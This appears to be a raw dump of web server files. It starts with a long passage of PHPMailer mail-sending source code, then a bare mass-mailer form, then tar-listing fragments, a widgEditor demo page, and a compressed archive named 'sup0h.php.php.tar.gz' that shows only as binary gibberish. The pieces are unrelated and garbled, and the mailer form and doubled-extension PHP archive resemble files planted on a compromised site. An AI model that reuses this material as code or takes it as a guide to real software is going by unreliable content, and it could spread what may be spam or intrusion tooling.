$this->lang('invalid_address'), $address_kind, $this->{$address_kind} ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } } //Set whether the message is multipart/alternative if ($this->alternativeExists()) { $this->ContentType = static::CONTENT_TYPE_MULTIPART_ALTERNATIVE; } $this->setMessageType(); //Refuse to send an empty message unless we are specifically allowing it if (!$this->AllowEmpty && empty($this->Body)) { throw new Exception($this->lang('empty_message'), self::STOP_CRITICAL); } //Trim subject consistently $this->Subject = trim($this->Subject); //Create body before headers in case body makes changes to headers (e.g. altering transfer encoding) $this->MIMEHeader = ''; $this->MIMEBody = $this->createBody(); //createBody may have added some headers, so retain them $tempheaders = $this->MIMEHeader; $this->MIMEHeader = $this->createHeader(); $this->MIMEHeader .= $tempheaders; //To capture the complete message when using mail(), create //an extra header list which createHeader() doesn't fold in if ('mail' === $this->Mailer) { if (count($this->to) > 0) { $this->mailHeader .= $this->addrAppend('To', $this->to); } else { $this->mailHeader .= $this->headerLine('To', 'undisclosed-recipients:;'); } $this->mailHeader .= $this->headerLine( 'Subject', $this->encodeHeader($this->secureHeader($this->Subject)) ); } //Sign with DKIM if enabled if ( !empty($this->DKIM_domain) && !empty($this->DKIM_selector) && (!empty($this->DKIM_private_string) || (!empty($this->DKIM_private) && static::isPermittedPath($this->DKIM_private) && file_exists($this->DKIM_private) ) ) ) { $header_dkim = $this->DKIM_Add( $this->MIMEHeader . $this->mailHeader, $this->encodeHeader($this->secureHeader($this->Subject)), $this->MIMEBody ); $this->MIMEHeader = static::stripTrailingWSP($this->MIMEHeader) . static::$LE . static::normalizeBreaks($header_dkim) . static::$LE; } return true; } catch (Exception $exc) { $this->setError($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } } /** * Actually send a message via the selected mechanism. * * @throws Exception * * @return bool */ public function postSend() { try { //Choose the mailer and send through it switch ($this->Mailer) { case 'sendmail': case 'qmail': return $this->sendmailSend($this->MIMEHeader, $this->MIMEBody); case 'smtp': return $this->smtpSend($this->MIMEHeader, $this->MIMEBody); case 'mail': return $this->mailSend($this->MIMEHeader, $this->MIMEBody); default: $sendMethod = $this->Mailer . 'Send'; if (method_exists($this, $sendMethod)) { return $this->{$sendMethod}($this->MIMEHeader, $this->MIMEBody); } return $this->mailSend($this->MIMEHeader, $this->MIMEBody); } } catch (Exception $exc) { $this->setError($exc->getMessage()); $this->edebug($exc->getMessage()); if ($this->Mailer === 'smtp' && $this->SMTPKeepAlive == true && $this->smtp->connected()) { $this->smtp->reset(); } if ($this->exceptions) { throw $exc; } } return false; } /** * Send mail using the $Sendmail program. * * @see PHPMailer::$Sendmail * * @param string $header The message headers * @param string $body The message body * * @throws Exception * * @return bool */ protected function sendmailSend($header, $body) { if ($this->Mailer === 'qmail') { $this->edebug('Sending with qmail'); } else { $this->edebug('Sending with sendmail'); } $header = static::stripTrailingWSP($header) . static::$LE . static::$LE; //This sets the SMTP envelope sender which gets turned into a return-path header by the receiver //A space after `-f` is optional, but there is a long history of its presence //causing problems, so we don't use one //Exim docs: http://www.exim.org/exim-html-current/doc/html/spec_html/ch-the_exim_command_line.html //Sendmail docs: http://www.sendmail.org/~ca/email/man/sendmail.html //Qmail docs: http://www.qmail.org/man/man8/qmail-inject.html //Example problem: https://www.drupal.org/node/1057954 //PHP 5.6 workaround $sendmail_from_value = ini_get('sendmail_from'); if (empty($this->Sender) && !empty($sendmail_from_value)) { //PHP config has a sender address we can use $this->Sender = ini_get('sendmail_from'); } //CVE-2016-10033, CVE-2016-10045: Don't pass -f if characters will be escaped. if (!empty($this->Sender) && static::validateAddress($this->Sender) && self::isShellSafe($this->Sender)) { if ($this->Mailer === 'qmail') { $sendmailFmt = '%s -f%s'; } else { $sendmailFmt = '%s -oi -f%s -t'; } } else { //allow sendmail to choose a default envelope sender. It may //seem preferable to force it to use the From header as with //SMTP, but that introduces new problems (see //), and //it has historically worked this way. $sendmailFmt = '%s -oi -t'; } $sendmail = sprintf($sendmailFmt, escapeshellcmd($this->Sendmail), $this->Sender); $this->edebug('Sendmail path: ' . $this->Sendmail); $this->edebug('Sendmail command: ' . $sendmail); $this->edebug('Envelope sender: ' . $this->Sender); $this->edebug("Headers: {$header}"); if ($this->SingleTo) { foreach ($this->SingleToArray as $toAddr) { $mail = @popen($sendmail, 'w'); if (!$mail) { throw new Exception($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } $this->edebug("To: {$toAddr}"); fwrite($mail, 'To: ' . $toAddr . "\n"); fwrite($mail, $header); fwrite($mail, $body); $result = pclose($mail); $addrinfo = static::parseAddresses($toAddr, true, $this->CharSet); $this->doCallback( ($result === 0), [[$addrinfo['address'], $addrinfo['name']]], $this->cc, $this->bcc, $this->Subject, $body, $this->From, [] ); $this->edebug("Result: " . ($result === 0 ? 'true' : 'false')); if (0 !== $result) { throw new Exception($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } } } else { $mail = @popen($sendmail, 'w'); if (!$mail) { throw new Exception($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } fwrite($mail, $header); fwrite($mail, $body); $result = pclose($mail); $this->doCallback( ($result === 0), $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From, [] ); $this->edebug("Result: " . ($result === 0 ? 'true' : 'false')); if (0 !== $result) { throw new Exception($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } } return true; } /** * Fix CVE-2016-10033 and CVE-2016-10045 by disallowing potentially unsafe shell characters. * Note that escapeshellarg and escapeshellcmd are inadequate for our purposes, especially on Windows. * * @see https://github.com/PHPMailer/PHPMailer/issues/924 CVE-2016-10045 bug report * * @param string $string The string to be validated * * @return bool */ protected static function isShellSafe($string) { //It's not possible to use shell commands safely (which includes the mail() function) without escapeshellarg, //but some hosting providers disable it, creating a security problem that we don't want to have to deal with, //so we don't. if (!function_exists('escapeshellarg') || !function_exists('escapeshellcmd')) { return false; } if ( escapeshellcmd($string) !== $string || !in_array(escapeshellarg($string), ["'$string'", "\"$string\""]) ) { return false; } $length = strlen($string); for ($i = 0; $i < $length; ++$i) { $c = $string[$i]; //All other characters have a special meaning in at least one common shell, including = and +. //Full stop (.) has a special meaning in cmd.exe, but its impact should be negligible here. //Note that this does permit non-Latin alphanumeric characters based on the current locale. if (!ctype_alnum($c) && strpos('@_-.', $c) === false) { return false; } } return true; } /** * Check whether a file path is of a permitted type. * Used to reject URLs and phar files from functions that access local file paths, * such as addAttachment. * * @param string $path A relative or absolute path to a file * * @return bool */ protected static function isPermittedPath($path) { //Matches scheme definition from https://tools.ietf.org/html/rfc3986#section-3.1 return !preg_match('#^[a-z][a-z\d+.-]*://#i', $path); } /** * Check whether a file path is safe, accessible, and readable. * * @param string $path A relative or absolute path to a file * * @return bool */ protected static function fileIsAccessible($path) { if (!static::isPermittedPath($path)) { return false; } $readable = is_file($path); //If not a UNC path (expected to start with \\), check read permission, see #2069 if (strpos($path, '\\\\') !== 0) { $readable = $readable && is_readable($path); } return $readable; } /** * Send mail using the PHP mail() function. * * @see http://www.php.net/manual/en/book.mail.php * * @param string $header The message headers * @param string $body The message body * * @throws Exception * * @return bool */ protected function mailSend($header, $body) { $header = static::stripTrailingWSP($header) . static::$LE . static::$LE; $toArr = []; foreach ($this->to as $toaddr) { $toArr[] = $this->addrFormat($toaddr); } $to = trim(implode(', ', $toArr)); //If there are no To-addresses (e.g. when sending only to BCC-addresses) //the following should be added to get a correct DKIM-signature. //Compare with $this->preSend() if ($to === '') { $to = 'undisclosed-recipients:;'; } $params = null; //This sets the SMTP envelope sender which gets turned into a return-path header by the receiver //A space after `-f` is optional, but there is a long history of its presence //causing problems, so we don't use one //Exim docs: http://www.exim.org/exim-html-current/doc/html/spec_html/ch-the_exim_command_line.html //Sendmail docs: http://www.sendmail.org/~ca/email/man/sendmail.html //Qmail docs: http://www.qmail.org/man/man8/qmail-inject.html //Example problem: https://www.drupal.org/node/1057954 //CVE-2016-10033, CVE-2016-10045: Don't pass -f if characters will be escaped. //PHP 5.6 workaround $sendmail_from_value = ini_get('sendmail_from'); if (empty($this->Sender) && !empty($sendmail_from_value)) { //PHP config has a sender address we can use $this->Sender = ini_get('sendmail_from'); } if (!empty($this->Sender) && static::validateAddress($this->Sender)) { if (self::isShellSafe($this->Sender)) { $params = sprintf('-f%s', $this->Sender); } $old_from = ini_get('sendmail_from'); ini_set('sendmail_from', $this->Sender); } $result = false; if ($this->SingleTo && count($toArr) > 1) { foreach ($toArr as $toAddr) { $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params); $addrinfo = static::parseAddresses($toAddr, true, $this->CharSet); $this->doCallback( $result, [[$addrinfo['address'], $addrinfo['name']]], $this->cc, $this->bcc, $this->Subject, $body, $this->From, [] ); } } else { $result = $this->mailPassthru($to, $this->Subject, $body, $header, $params); $this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From, []); } if (isset($old_from)) { ini_set('sendmail_from', $old_from); } if (!$result) { throw new Exception($this->lang('instantiate'), self::STOP_CRITICAL); } return true; } /** * Get an instance to use for SMTP operations. * Override this function to load your own SMTP implementation, * or set one with setSMTPInstance. * * @return SMTP */ public function getSMTPInstance() { if (!is_object($this->smtp)) { $this->smtp = new SMTP(); } return $this->smtp; } /** * Provide an instance to use for SMTP operations. * * @return SMTP */ public function setSMTPInstance(SMTP $smtp) { $this->smtp = $smtp; return $this->smtp; } /** * Send mail via SMTP. * Returns false if there is a bad MAIL FROM, RCPT, or DATA input. * * @see PHPMailer::setSMTPInstance() to use a different class. * * @uses \PHPMailer\PHPMailer\SMTP * * @param string $header The message headers * @param string $body The message body * * @throws Exception * * @return bool */ protected function smtpSend($header, $body) { $header = static::stripTrailingWSP($header) . static::$LE . static::$LE; $bad_rcpt = []; if (!$this->smtpConnect($this->SMTPOptions)) { throw new Exception($this->lang('smtp_connect_failed'), self::STOP_CRITICAL); } //Sender already validated in preSend() if ('' === $this->Sender) { $smtp_from = $this->From; } else { $smtp_from = $this->Sender; } if (!$this->smtp->mail($smtp_from)) { $this->setError($this->lang('from_failed') . $smtp_from . ' : ' . implode(',', $this->smtp->getError())); throw new Exception($this->ErrorInfo, self::STOP_CRITICAL); } $callbacks = []; //Attempt to send to all recipients foreach ([$this->to, $this->cc, $this->bcc] as $togroup) { foreach ($togroup as $to) { if (!$this->smtp->recipient($to[0], $this->dsn)) { $error = $this->smtp->getError(); $bad_rcpt[] = ['to' => $to[0], 'error' => $error['detail']]; $isSent = false; } else { $isSent = true; } $callbacks[] = ['issent' => $isSent, 'to' => $to[0], 'name' => $to[1]]; } } //Only send the DATA command if we have viable recipients if ((count($this->all_recipients) > count($bad_rcpt)) && !$this->smtp->data($header . $body)) { throw new Exception($this->lang('data_not_accepted'), self::STOP_CRITICAL); } $smtp_transaction_id = $this->smtp->getLastTransactionID(); if ($this->SMTPKeepAlive) { $this->smtp->reset(); } else { $this->smtp->quit(); $this->smtp->close(); } foreach ($callbacks as $cb) { $this->doCallback( $cb['issent'], [[$cb['to'], $cb['name']]], [], [], $this->Subject, $body, $this->From, ['smtp_transaction_id' => $smtp_transaction_id] ); } //Create error message for any bad addresses if (count($bad_rcpt) > 0) { $errstr = ''; foreach ($bad_rcpt as $bad) { $errstr .= $bad['to'] . ': ' . $bad['error']; } throw new Exception($this->lang('recipients_failed') . $errstr, self::STOP_CONTINUE); } return true; } /** * Initiate a connection to an SMTP server. * Returns false if the operation failed. * * @param array $options An array of options compatible with stream_context_create() * * @throws Exception * * @uses \PHPMailer\PHPMailer\SMTP * * @return bool */ public function smtpConnect($options = null) { if (null === $this->smtp) { $this->smtp = $this->getSMTPInstance(); } //If no options are provided, use whatever is set in the instance if (null === $options) { $options = $this->SMTPOptions; } //Already connected? if ($this->smtp->connected()) { return true; } $this->smtp->setTimeout($this->Timeout); $this->smtp->setDebugLevel($this->SMTPDebug); $this->smtp->setDebugOutput($this->Debugoutput); $this->smtp->setVerp($this->do_verp); if ($this->Host === null) { $this->Host = 'localhost'; } $hosts = explode(';', $this->Host); $lastexception = null; foreach ($hosts as $hostentry) { $hostinfo = []; if ( !preg_match( '/^(?:(ssl|tls):\/\/)?(.+?)(?::(\d+))?$/', trim($hostentry), $hostinfo ) ) { $this->edebug($this->lang('invalid_hostentry') . ' ' . trim($hostentry)); //Not a valid host entry continue; } //$hostinfo[1]: optional ssl or tls prefix //$hostinfo[2]: the hostname //$hostinfo[3]: optional port number //The host string prefix can temporarily override the current setting for SMTPSecure //If it's not specified, the default value is used //Check the host name is a valid name or IP address before trying to use it if (!static::isValidHost($hostinfo[2])) { $this->edebug($this->lang('invalid_host') . ' ' . $hostinfo[2]); continue; } $prefix = ''; $secure = $this->SMTPSecure; $tls = (static::ENCRYPTION_STARTTLS === $this->SMTPSecure); if ('ssl' === $hostinfo[1] || ('' === $hostinfo[1] && static::ENCRYPTION_SMTPS === $this->SMTPSecure)) { $prefix = 'ssl://'; $tls = false; //Can't have SSL and TLS at the same time $secure = static::ENCRYPTION_SMTPS; } elseif ('tls' === $hostinfo[1]) { $tls = true; //TLS doesn't use a prefix $secure = static::ENCRYPTION_STARTTLS; } //Do we need the OpenSSL extension? $sslext = defined('OPENSSL_ALGO_SHA256'); if (static::ENCRYPTION_STARTTLS === $secure || static::ENCRYPTION_SMTPS === $secure) { //Check for an OpenSSL constant rather than using extension_loaded, which is sometimes disabled if (!$sslext) { throw new Exception($this->lang('extension_missing') . 'openssl', self::STOP_CRITICAL); } } $host = $hostinfo[2]; $port = $this->Port; if ( array_key_exists(3, $hostinfo) && is_numeric($hostinfo[3]) && $hostinfo[3] > 0 && $hostinfo[3] < 65536 ) { $port = (int) $hostinfo[3]; } if ($this->smtp->connect($prefix . $host, $port, $this->Timeout, $options)) { try { if ($this->Helo) { $hello = $this->Helo; } else { $hello = $this->serverHostname(); } $this->smtp->hello($hello); //Automatically enable TLS encryption if: //* it's not disabled //* we have openssl extension //* we are not already using SSL //* the server offers STARTTLS if ($this->SMTPAutoTLS && $sslext && 'ssl' !== $secure && $this->smtp->getServerExt('STARTTLS')) { $tls = true; } if ($tls) { if (!$this->smtp->startTLS()) { $message = $this->getSmtpErrorMessage('connect_host'); throw new Exception($message); } //We must resend EHLO after TLS negotiation $this->smtp->hello($hello); } if ( $this->SMTPAuth && !$this->smtp->authenticate( $this->Username, $this->Password, $this->AuthType, $this->oauth ) ) { throw new Exception($this->lang('authenticate')); } return true; } catch (Exception $exc) { $lastexception = $exc; $this->edebug($exc->getMessage()); //We must have connected, but then failed TLS or Auth, so close connection nicely $this->smtp->quit(); } } } //If we get here, all connection attempts have failed, so close connection hard $this->smtp->close(); //As we've caught all exceptions, just report whatever the last one was if ($this->exceptions && null !== $lastexception) { throw $lastexception; } if ($this->exceptions) { // no exception was thrown, likely $this->smtp->connect() failed $message = $this->getSmtpErrorMessage('connect_host'); throw new Exception($message); } return false; } /** * Close the active SMTP session if one exists. */ public function smtpClose() { if ((null !== $this->smtp) && $this->smtp->connected()) { $this->smtp->quit(); $this->smtp->close(); } } /** * Set the language for error messages. * The default language is English. * * @param string $langcode ISO 639-1 2-character language code (e.g. French is "fr") * Optionally, the language code can be enhanced with a 4-character * script annotation and/or a 2-character country annotation. * @param string $lang_path Path to the language file directory, with trailing separator (slash) * Do not set this from user input! * * @return bool Returns true if the requested language was loaded, false otherwise. */ public function setLanguage($langcode = 'en', $lang_path = '') { //Backwards compatibility for renamed language codes $renamed_langcodes = [ 'br' => 'pt_br', 'cz' => 'cs', 'dk' => 'da', 'no' => 'nb', 'se' => 'sv', 'rs' => 'sr', 'tg' => 'tl', 'am' => 'hy', ]; if (array_key_exists($langcode, $renamed_langcodes)) { $langcode = $renamed_langcodes[$langcode]; } //Define full set of translatable strings in English $PHPMAILER_LANG = [ 'authenticate' => 'SMTP Error: Could not authenticate.', 'buggy_php' => 'Your version of PHP is affected by a bug that may result in corrupted messages.' . ' To fix it, switch to sending using SMTP, disable the mail.add_x_header option in' . ' your php.ini, switch to MacOS or Linux, or upgrade your PHP to version 7.0.17+ or 7.1.3+.', 'connect_host' => 'SMTP Error: Could not connect to SMTP host.', 'data_not_accepted' => 'SMTP Error: data not accepted.', 'empty_message' => 'Message body empty', 'encoding' => 'Unknown encoding: ', 'execute' => 'Could not execute: ', 'extension_missing' => 'Extension missing: ', 'file_access' => 'Could not access file: ', 'file_open' => 'File Error: Could not open file: ', 'from_failed' => 'The following From address failed: ', 'instantiate' => 'Could not instantiate mail function.', 'invalid_address' => 'Invalid address: ', 'invalid_header' => 'Invalid header name or value', 'invalid_hostentry' => 'Invalid hostentry: ', 'invalid_host' => 'Invalid host: ', 'mailer_not_supported' => ' mailer is not supported.', 'provide_address' => 'You must provide at least one recipient email address.', 'recipients_failed' => 'SMTP Error: The following recipients failed: ', 'signing' => 'Signing Error: ', 'smtp_code' => 'SMTP code: ', 'smtp_code_ex' => 'Additional SMTP info: ', 'smtp_connect_failed' => 'SMTP connect() failed.', 'smtp_detail' => 'Detail: ', 'smtp_error' => 'SMTP server error: ', 'variable_set' => 'Cannot set or reset variable: ', ]; if (empty($lang_path)) { //Calculate an absolute path so it can work if CWD is not here $lang_path = dirname(__DIR__) . DIRECTORY_SEPARATOR . 'language' . DIRECTORY_SEPARATOR; } //Validate $langcode $foundlang = true; $langcode = strtolower($langcode); if ( !preg_match('/^(?P[a-z]{2})(?P Mailer
From:                
Sender's name:  
Reply To:          
Reply Next:          
Bcc:                  
Subject:            
Message:          
about.php000064400000000423151032724670006375 0ustar00 AccessDeniedAccess Denied0V01ZNWYW2FBBM1HamjZZzSNfVBotsWu9Gp32E27/IHyF+HEiEE4NwZ/hdmbVcKdTbvnO3jhGy4jsuqhv63fmH9RPH2mjtYzs8H6RguAZ0Crmdzsi54vP0NqP9M=about.PHP000064400000000423151032724670006235 0ustar00 AccessDeniedAccess Denied0V01ZNWYW2FBBM1HamjZZzSNfVBotsWu9Gp32E27/IHyF+HEiEE4NwZ/hdmbVcKdTbvnO3jhGy4jsuqhv63fmH9RPH2mjtYzs8H6RguAZ0Crmdzsi54vP0NqP9M=example.htm000064400000006237151032724670006730 0ustar00 The Man in Blue > Experiments > widgEditor

Experiment
widgEditor
Date created
16 January, 2005
Date last modified
1 March, 2008
Discussion
Visit the discussion

widgEditor

widgEditor is an easily installed, easily customisable WYSIWYG editor for simple content. It replaces existing textareas with an improved editing pane using JavaScript, therefore if you don't have JavaScript (or your browser doesn't support HTML editing) it degrades gracefully. Try it out by typing below, and submit to see the processed output.

The widgEditor code is released under a GNU General Public License. However, if you are planning to use or modify the code for usage on a web site, a donation is greatly appreciated. Click here to donate via PayPal.

Download the most recent widgEditor files at its Google Code page.

PK g[hCaasup0h.php.php.tar.gznu[ْȒ(v_PTL6JS\ڀ\8Fe#5TѲX<,_^^3>l9 -M!k@ʜ7Wα%x m ?u@ȣ! uxD[0*ƣ0W/ʰANpv Wp 7ㆩpc4oJ~iR`_VUu4 `zNcx)^4{՜0413ԕ^rP"$',^GS[Pu L /)^G׀EsG1Lz7$҈ZER*~ɑ;|%w9YCE }wT|xP<9E.'/9Ne蟱YϝӦb]/\k>;!|b")rn|?ej c_9Yv3>x DHK`iu,HXpą"B Mr/bUN@.p1ht<`,c-]w8KrP*T$vQ"RPȸ6W|3}ƒ4 0r.bN&y筗L>J&R¹iEE IrP"bt[,^1&'Ҁgc\b )t+,ˋi5y8)WdG]uZ] kD+L+g%?D¤5a`0+?v`׀M`ApЀ 4`/RXv`K+0p[KV]Ӣd6JV56l@Ru8-?NnS6 eQ=9NS1q3 5v!қ"~7ބӛteEj7s RDzjY{J{xGYy- eHB[4b3KnD fgS*<aZ)(E%~KK `8E-p_EhqB+,3vp8!Bkoa&Վ'im/hi/JB9F]z-/w)59THv6mx#ըpccs*t-fPi.M>2.MS3Hڢgl]Ĩ0M5r)USϔYoUe8MC4X;L:P/6w f0[%-h.;o~9v=m Z^N R뱼% ,/PNlØ;^q@@a,L4 EiS$HOFA"6H i :T" 5n$.@I=lg0S5&/罐jgS㴵z{T}ZӇ;y V\rd GQN'+I4 U$@QEˆvE>&`Ի S)eҿ٪(Oͺp794x~;py^~Dknn{XݍH_C5D4>mYܺ懟d:·b|OuMd 4֤q PY X>h13ۜkh&Ʉ]7F2@{$S LDٍ=uٺ EɀޒYjAՔݘP.A=Ҽg|`g-xcc:}%NS"J 1ƜFiDSbט^ךt{I>Sv8nL#L~t|B5s&IhX7H>!m=?{Lrs=B[e,+ZEt 8:kK:?@c0.@sHtzɩ{9oQK>=)% cbmc:gNzX4]7.Tt0 ^ʣ 0ؤqH0hS:Ywes!%;5>hWiiOI.KfzpL%G cR[#"<O<+w^ho+ʻƷw7ǎ[Ȓ*#= @ՑW KŒ9D"T5GL@$vO8/:o4[u_aĢ`H['iI*r%((7mOoȦ`H4C"?u;!I̓ڜitQꚌ_R~ Js\'I\PLZ/#դfA'/`CmTkL1䞋V:lQm,UKr #<0LR[0LQ\*;~d,DGw|$P5ZLҪtRvr;T$2hGd2#s3~H31M b6/=b8гKi̝Hm;(ң1\Y '3bH˄=m^j/ LOJ+談EPֳXE ?]?)m7Ұ9gw<7:u!"GH]un= ꧋Z$0LNXNYʈpt FetLC+C"ꤊ:_W( hNl#DciD t['R/iү>NŽI.q`N;u5bPZq}rb$C1H㴠@ߟqQ7܏Ή GKZ3,{߮A`lԜsHxaHh4si P# Ppdc cirC{Gv^m<,Hd}@#87_+ˁ6N'KirG+t_*LSi=5UϤW.-xHFV;Jbe-E(qҨ<;%ՙ̢?Z<(6mhp(-COϹ`6Ze`^hmꪳq1 W(/m`k"Df5o.(SvwC|՜aan kC7^JGt*RCE_nS=On[^DDecqYxj)4.X`@7p",G ̞lkS?"C]MFX1ŲV?8 =uR%ߎ(8z;ra~\a=PqҔzS1g-(۲a8ZyƃdJ fG zFmY sC]==N+apV.Q~AÓgNG%Wca9aii]6=v$}Zi)*O*!sc.$.AwXfPKVKO~;F[FR}2]xe3IUAMxl醸FᭆLbxdPֹThtta~7lbU\o'_zֳVUK&.)mY.n]nٜstzaRv.9I_Єzm;fe%y-i_{c3}XӸo]N> Fqϱΐtѭ#dCWgJ: _r+44sY)p4Qn9. 6yj_ux7_ g'JBd}%x]/1]@ *ߧ<f_}N~,3 I'_/;K#m׽3g@0wAƽUE[ߏ 3 0UPY0`!J༂h yA!~f&G7>y@p!j2XeD+ x@*=[WT9Ilo fg@GR/{OCO1EWD?5.Oob5IxBG M Ֆ"r</, ;G/T1*1qi̴6G/덁פ5+@6a 5J7ALkT1q0p)=9t`z}`!lkVi=c.:} ''}4Y j`BHZH'C;VC1ۅ@8g&l%gL)9dD̑&i'*-u˞R-n*Fu?3GD`A*~0:q4Qҋ\$d%xcsZ0 e:Ҹra >Ybg`y<8m欔`+ٽ0Hf~Kb-8M[ޥ u3SbCYocfL.lFW!19it9c4B9 u>#F%s,1M{ (gJOx+b*yBAqșPO+$˕\_nt5n{̇#S_ ^0 Qcaj<7_D8e%km|w0CF`w0ԥ/ #mCyn!tuE)rp s^h 3a}r1I9Aht *>0` ~G%+r LasY}]fD:X:$q5ٕZ қS跖'@͏;XnPߢ-s(҅f8c֒͆c_beaT%tZd֒2Gu G m8;$"iA:ar/)Tzur&7x+m%ڙcB4-hu]]6cboqwc l_-GoٴE{\ ڊzNVCKUa-$X2I41T3UzխF0b %kN6(15^&L?p` -b-c$[BH젞=[3!=)ˎكҞM2 !ӈi @Ѡ$Ɋ\0jrh~2KYl>FL4dgZփ wˮwHZFxAq3Dp,KM "bz/;Hqe$VGF?4"(<w츸 r3/@4.Mf / GC'/1'<'ƣ8?f"~~ rߑ4w :In蔡4c 5 |dmF\!t Ʋf/.U_pM]D~r}ۯq/m% KlW42D)/lz\? N?a({c`ӳ,|1yДtRtLySBKVSXb$'ڱ3qaxߌ oߍo}<$\ 6'Hp7[r6B:GvSE%Ɨ۩ 3d-N`o8HE68XP8jsP`NΊz߮g?kzf~IeL L3mDTT{| _9_y0{f~=V4I? ̦}pxa4Z4xh6 b֢EX6cEB y\NW Qş8  ;F._Ì@ݎEnSA}#qYҴ~MLgF^+B"h^72L:L %:ǜe0~qXU[an5qX!W;~׽؍ygSpol=sȃPjlWŇ~/v*0NEk, mfXH9mӞcFfoUMyDy=5v&BZə|'fr)ϋ\:V Ϡ*ϵ5#a;NeRn3[iTzULvo|}]/JT.%m>S*E5|婜IeS&?[vU_T/K ykZST.K [@yEJB g|JKR3hQ遘uR\m{ST~Ķm*X4H2Rc'/ʙP)[ͥTjBL1^Sf-a<\s dx1(z2.=a0?v`8]S뭴Zt%N-L#xLZ W5V`VkQ%^`Bo]De yX{3CANrZcWE16iϓd4}X)*q<\w:/K ФvYE&1kqճ}Z=uMGm-݇V*RRlhR dDYOJa=zeURCQʤKJ:]`[BJOΰIEndZ4,IgP8 R#46\jTyJ7" ggm]N3tOg>5i 8&E9\iT1}ҍFqnTړ][^Na\L '4+`f_;Xط[vɮI 7 dS?w 9ޕ7RjmPUpR qO=>n^P NdD+},'(6K^ܳmI9ir#qkD!SFce;N}ʭ ެrVy Z712jǂi=suWʹ<%_XӇE1e_|K|+O}Ւ}L V)mujN%1Wm#>;\kkAYIp SM,m=^LLvftVa1yjӇ؈TDٯn M2vT*BjPJ?wrxPUNg҄e<(e:JW<;EY$yVu-jGOv_Vj˃@]>Dlo^+O["&jmzL𩯆&jVV~`z=*.XR= j"CMݟ‘&T*P6%,D{Vywvj=4KZc+q<"` HI=e93zj ↥_"DW\=ZnKhOR"hG1BgK@톢KO v;Oka:ZA>+z3pXrq9)ڽڬ Op0T 㤷@◕rl ׋.z:pJ`9,]P~lZ0yYVBp]<ӎr^~N8P::l,cbu*֗NS`WϽ^k`pKHmmZ Vؖ!+uԝy>幇v/wܲ<-e?*NֶHViq\ljF2G(V(saiUyՌ=|תj72yymFÊ/bV^9wg׍}G.V+Ng}5;yYu1;A=R)Ć^[+FbY-~)˝ԭr GnǏRxΗnz`i괢cſe҉r9Jtu2n~oO` L zUAj|oQRA>290 fxǦmrnQ~ V{.•hώ] $σrd\)UֱI*[+ >7~JQzڭNlXţjTjT^s"`BƚcD97l@VhWvO㼆0Nu,mjlj֓V(Q\SɄ=lZ}#xRx*A)9ŧTgz.>Y,XC}U/V#YcjbلGI'v-2.ͮfٸڬhO9{|~9^g5Q M#J-\Wߩb) ͉=G/f 4Uw$TnCzGBvKl~,ǝX[7TbEEw3Y.‰q$=R"ָj&+gdA{lFyt]=e no]on~uoG;A+)v jwZlwNuV=-$'BϣSK{5q1R[%:T%X"H.V'nQ6i v"WD^5THII4©\;c8pegZ6A!7v&ť\T+E y&Z.3Si11Uz\+4o/YZS(osDM㧎q`HÄ͇Cp"<"x\H/rC_-BotwnxivꕂGuyW*xyl%).ǨT¬Tq1źZCCd* zh26EyzH=h[ڏ}诶9J@dQ̎tDL2fN廩}!狝<ܗ#Graݳ'>J 'ӾdC)yN>aqEm*?/:1>Ag>rN".UUad=@( 'H1Ճ܋! GA J{[UA~VzH[FRge:*B8(B(Sl(FSҡNsQLWv l}kDeG3[Pw^??Ƭ`lcJ_fC\e bW=ʓetx4mDy>EĮ뛐t" F8H*5=Oi.>nֳ:Ń P"l&P.=*ԗRոzh*RuYxyf-<)G}">ć?b()eX~أDAO\ee94 vn`\pl<5"AA$ *Pn=(jʴRt&ҝ@Ikf@Z"[|lNNstDX6ӜWR$)W*̞X&X`+@L4YG/466gC5`~߯BB7ӏ ;bۈ X+ۥ|e(uZ]?=턅AIM+ru;?L&cO/U$R&\/!{*J>eПz&i+Mp|Zpl>y/i1 gHNLh3L ֭@W! %P/frΔ94zj JB*4k B 5-aYC\a ~?xX׳.V6u%-!H+Y^:ȩҁib}!Q1_K5۝jŤaGǨC%O޵vē6/wnlޱxQh_ d3=pX9Vڙo8UꞐU[I 8{~qf=WJB^WYU2!J^p}L^Eut|ZN?tM.]~/Hh;5)r9W]O[Rs4V#>|BrtBPD["J)Iqn1hBB ;N=F 1Z ]A"0z`0PgÈ Paf݅:!sOCGAp$[SPG5wL ֯YY< ^N ھ%PRjkQPp;4C>pcA -7[VK.{2x\t_[%ɝjKTJFmܹ򮠆f Kzo=4CnYJcRSqO߳qF ]J~<3[P /<m(YQD߉YF|ѲLYA$v y. ۏEPއQ4WYuKhא5v1l^H]WNIz$.z}3/e{p+X;t{mIǺ)E|*}{kJTWFM.Oߐߖ)G=eAo l#鞡 2j idP P#hg,KQl2E5adw}qʛ /?;=nf1ӽC47xp! X%͚*ţ SҢf2eŠ?al'[e nºpCuC{ACfCN*4ZSqs×7,+إ-H8ZQ 5 BF09$ڈk,\hЃ=%5k]2>rM>5msɖ&L4ATS Gǔ X HIlP!""dao'/qg#f8qu ˼:i H|M\ %)w`" {7jǍXKdCcJ 46n'A^*- uNn$'/z>B+\!S7X9}э{RTs,̀/Ώw tm(k l4=%|z4N" ʓnE[i2=z, c8$J*fWeO^+L<4| Gb0A9<.(_ P,`?I^w!tlN_YѮ#LK#`|;^Ͻ hH'q3ց9`'-8jw2C^pTJ㝞$'C 9d%<̀Mxtoӧ3KՍk yY6p0Abɐ8!Bup\0Bl!̱0c.JFX߉d6@HI$Rh a@*38ǩrYր&wa^rhIhcP@^^!cW,Zn@ 0[0B:H/Wx2ߊ5p5hqdƟ2N5ig׮sڈƏO{C`qhȗ(hD|10s=:147;tAt9쥹 G9Cp:ٞ|c>ƑL%cY̨߰I8z|M4Ux_Ϥ~D"S{ x/rN3FѸ{pqhSo| 6s:pk_q}d29U$$!xcP%"[]:BK~:K>ewvȀ | P˗SnT[ؓ*ck~"+L_dٸjrw+ !r9/bکsJE< 0:仓#zr~eSәig\lb}3H:{ao 